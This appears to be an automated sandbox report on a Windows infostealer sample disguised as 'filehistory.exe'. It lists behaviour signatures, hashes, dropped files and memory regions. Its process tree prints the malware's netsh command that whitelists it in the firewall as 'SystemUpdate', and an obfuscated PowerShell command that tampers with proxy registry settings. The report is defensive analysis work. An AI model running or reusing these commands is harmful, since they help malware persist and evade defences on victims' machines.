Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20/04/2023, 00:37

General

  • Target

    140000000.filehistory.exe

  • Size

    435KB

  • MD5

    fba73c5a9abd2782af4bcfbce153e299

  • SHA1

    bee739c3bcc4f415ef1f363229efbedf359cab6d

  • SHA256

    43cc6ed0dcd1fa220283f7bbfa79aaf6342fdb5e73cdabdde67debb7e2ffc945

  • SHA512

    f73396c01cbea32fc751f392c1de1f1aed47ee1f687752136894b9091a93ddbe6d5ced8a9b48fe2df63c1d21661da3479d196cd0f31ab3dd10c2f4339ea67c0f

  • SSDEEP

    12288:f8n3bVLUBUOw4ra554+zy+RG+EBH8ATUUC8up:mlG+G5p

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies system certificate store 2 TTPs 5 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\140000000.filehistory.exe
    "C:\Users\Admin\AppData\Local\Temp\140000000.filehistory.exe"
    1⤵
    • Accesses Microsoft Outlook profiles
    • Checks processor information in registry
    • Modifies system certificate store
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    • outlook_office_path
    • outlook_win_path
    PID:2548
    • C:\Windows\SYSTEM32\netsh.exe
      "netsh.exe" firewall add allowedprogram C:\Users\Admin\AppData\Local\Temp\140000000.filehistory.exe SystemUpdate ENABLE
      2⤵
      • Modifies Windows Firewall
      PID:3576
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -enc dwBoAGkAbABlACgAJAB0AHIAdQBlACkAewAKAHQAcgB5AHsAaQB3AHIAIAAnAGgAdAB0AHAAcwA6AC8ALwBlAHgAYQBtAHAAbABlAC4AYwBvAG0AJwAgAC0AdQBzAGUAYgBhAHMAaQBjAHAAYQByAHMAaQBuAGcAfQBjAGEAdABjAGgAewAKACQAcgBlAGcASwBlAHkAPQAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAEkAbgB0AGUAcgBuAGUAdAAgAFMAZQB0AHQAaQBuAGcAcwAiADsAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AcABhAHQAaAAgACQAcgBlAGcASwBlAHkAIABQAHIAbwB4AHkARQBuAGEAYgBsAGUAIAAtAHYAYQBsAHUAZQAgADAAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAdABvAHAAIAA7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAHAAYQB0AGgAIAAkAHIAZQBnAEsAZQB5ACAAUAByAG8AeAB5AFMAZQByAHYAZQByACAALQB2AGEAbAB1AGUAIAAiACIAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAdABvAHAAOwAgAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAHAAYQB0AGgAIAAkAHIAZQBnAEsAZQB5ACAAQQB1AHQAbwBDAG8AbgBmAGkAZwBVAFIATAAgAC0AVgBhAGwAdQBlACAAIgAiACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAHQAbwBwADsAZQB4AGkAdAAKAH0ACgBzAGwAZQBlAHAAIAAyAH0A
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3900

Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\TmpAAB7.tmp

          Filesize

          2KB

          MD5

          53c1f238fd9c66e75822ef7f0cf9e023

          SHA1

          8e0022770ab0861f5d5d53e4d95f25b0a73493e5

          SHA256

          c4a06e5c794c9012412edd964adfa4a29a5500ff9caa30f13b59918ee3b4230a

          SHA512

          bca73e30f4d05e0c61464269951a14c0d5ad89527f750f3682ebee37d9a11bba7b559849b57bfbce624732743381fc530f2d453cd49f6a7ac219d5e3edc3f281

        • C:\Users\Admin\AppData\Local\Temp\TmpBB82.tmp

          Filesize

          2KB

          MD5

          3d6b12a352f4bfa0ef25038ef4f7ba4f

          SHA1

          4f1eb3fd80afee9b50513a2fdfeb93520b5f24d6

          SHA256

          b0aa49637179704272bcd196874c4e776aa4dad2f71eb55e1a9e1c7d98785fb1

          SHA512

          295875ffdf2ee0deafc36d6d4dc11b54f49cdd94f9ae68d8c0bc602848583fa51951ec75144f6383172e504c9783794d5f4c6e1b7dce6de4a1a647e07fe41ab4

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xypuhoqf.onv.ps1

          Filesize

          60B

          MD5

          d17fe0a3f47be24a6453e9ef58c94641

          SHA1

          6ab83620379fc69f80c0242105ddffd7d98d5d9d

          SHA256

          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

          SHA512

          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        • C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\BD9D781B00BFCE0F0C9A916F7C5D62C9BAEA2756

          Filesize

          1KB

          MD5

          9c1b5723ecbb34aaf656189633a49330

          SHA1

          ab86927d6463406fb4dd5ccc151b466f9bbcf916

          SHA256

          daed2e976a6e9bb0eafa710bae9b0286c0247660b00389646638c73d92981fc1

          SHA512

          1cafa770f07d8f53a9826b88d1e7825a713b278c2e1a60f87f69141a743356a2366cc66466f09664505743b7f3d95d7b60b8ee461c9b5d769f5ae63283c5bc0b

        • C:\Users\Admin\AppData\Roaming\Microsoft\SystemCertificates\My\Keys\E39B4CFAEE73A6AD7993C9847646B4FE51241C65

          Filesize

          208B

          MD5

          7f257530d7daf13044f667da73b77105

          SHA1

          ce1d815e4a9153fb77c5724e5bcd2b21c7eea772

          SHA256

          71f7e28d1e5a38cda9b0b2bbd4777dd08e84daa923f14e9d9858d70f711653c4

          SHA512

          625d7ba0231ba3f5a9291677ece36186c39a495f1979bbf16eb92ef3d78d4a03b3b002afc79a45092a354b9365171ef67d34dc85494733b06ed97a4daa5ae259

        • memory/2548-170-0x0000013391380000-0x00000133914CE000-memory.dmp

          Filesize

          1.3MB

        • memory/2548-146-0x000001338FD40000-0x000001338FD50000-memory.dmp

          Filesize

          64KB

        • memory/2548-148-0x00000133A9590000-0x00000133A95B1000-memory.dmp

          Filesize

          132KB

        • memory/2548-149-0x00000133914D0000-0x00000133914E5000-memory.dmp

          Filesize

          84KB

        • memory/2548-150-0x00000133A9840000-0x00000133A988A000-memory.dmp

          Filesize

          296KB

        • memory/2548-151-0x0000013391380000-0x00000133914CE000-memory.dmp

          Filesize

          1.3MB

        • memory/2548-152-0x00000133AB5F0000-0x00000133AB666000-memory.dmp

          Filesize

          472KB

        • memory/2548-153-0x00000133A98C0000-0x00000133A98DE000-memory.dmp

          Filesize

          120KB

        • memory/2548-154-0x0000013391380000-0x00000133914CE000-memory.dmp

          Filesize

          1.3MB

        • memory/2548-155-0x0000013391380000-0x00000133914CE000-memory.dmp

          Filesize

          1.3MB

        • memory/2548-156-0x0000013391380000-0x00000133914CE000-memory.dmp

          Filesize

          1.3MB

        • memory/2548-133-0x000001338F620000-0x000001338F692000-memory.dmp

          Filesize

          456KB

        • memory/2548-246-0x0000013391380000-0x00000133914CE000-memory.dmp

          Filesize

          1.3MB

        • memory/2548-241-0x0000013391380000-0x00000133914CE000-memory.dmp

          Filesize

          1.3MB

        • memory/2548-238-0x0000013391380000-0x00000133914CE000-memory.dmp

          Filesize

          1.3MB

        • memory/2548-147-0x00000133A9590000-0x00000133A95B1000-memory.dmp

          Filesize

          132KB

        • memory/2548-145-0x0000013391380000-0x00000133914CE000-memory.dmp

          Filesize

          1.3MB

        • memory/2548-144-0x000001338FD40000-0x000001338FD50000-memory.dmp

          Filesize

          64KB

        • memory/2548-237-0x0000013391380000-0x00000133914CE000-memory.dmp

          Filesize

          1.3MB

        • memory/2548-217-0x0000013391380000-0x00000133914CE000-memory.dmp

          Filesize

          1.3MB

        • memory/2548-143-0x0000013391500000-0x0000013391522000-memory.dmp

          Filesize

          136KB

        • memory/3900-218-0x0000022E38EE0000-0x0000022E38EF0000-memory.dmp

          Filesize

          64KB

        • memory/3900-219-0x0000022E38EE0000-0x0000022E38EF0000-memory.dmp

          Filesize

          64KB

        • memory/3900-215-0x0000022E3B300000-0x0000022E3B44E000-memory.dmp

          Filesize

          1.3MB

        • memory/3900-173-0x0000022E38EE0000-0x0000022E38EF0000-memory.dmp

          Filesize

          64KB

        • memory/3900-240-0x0000022E3B300000-0x0000022E3B44E000-memory.dmp

          Filesize

          1.3MB

        • memory/3900-172-0x0000022E38EE0000-0x0000022E38EF0000-memory.dmp

          Filesize

          64KB

        • memory/3900-171-0x0000022E38EE0000-0x0000022E38EF0000-memory.dmp

          Filesize

          64KB

        • memory/3900-249-0x0000022E3B300000-0x0000022E3B44E000-memory.dmp

          Filesize

          1.3MB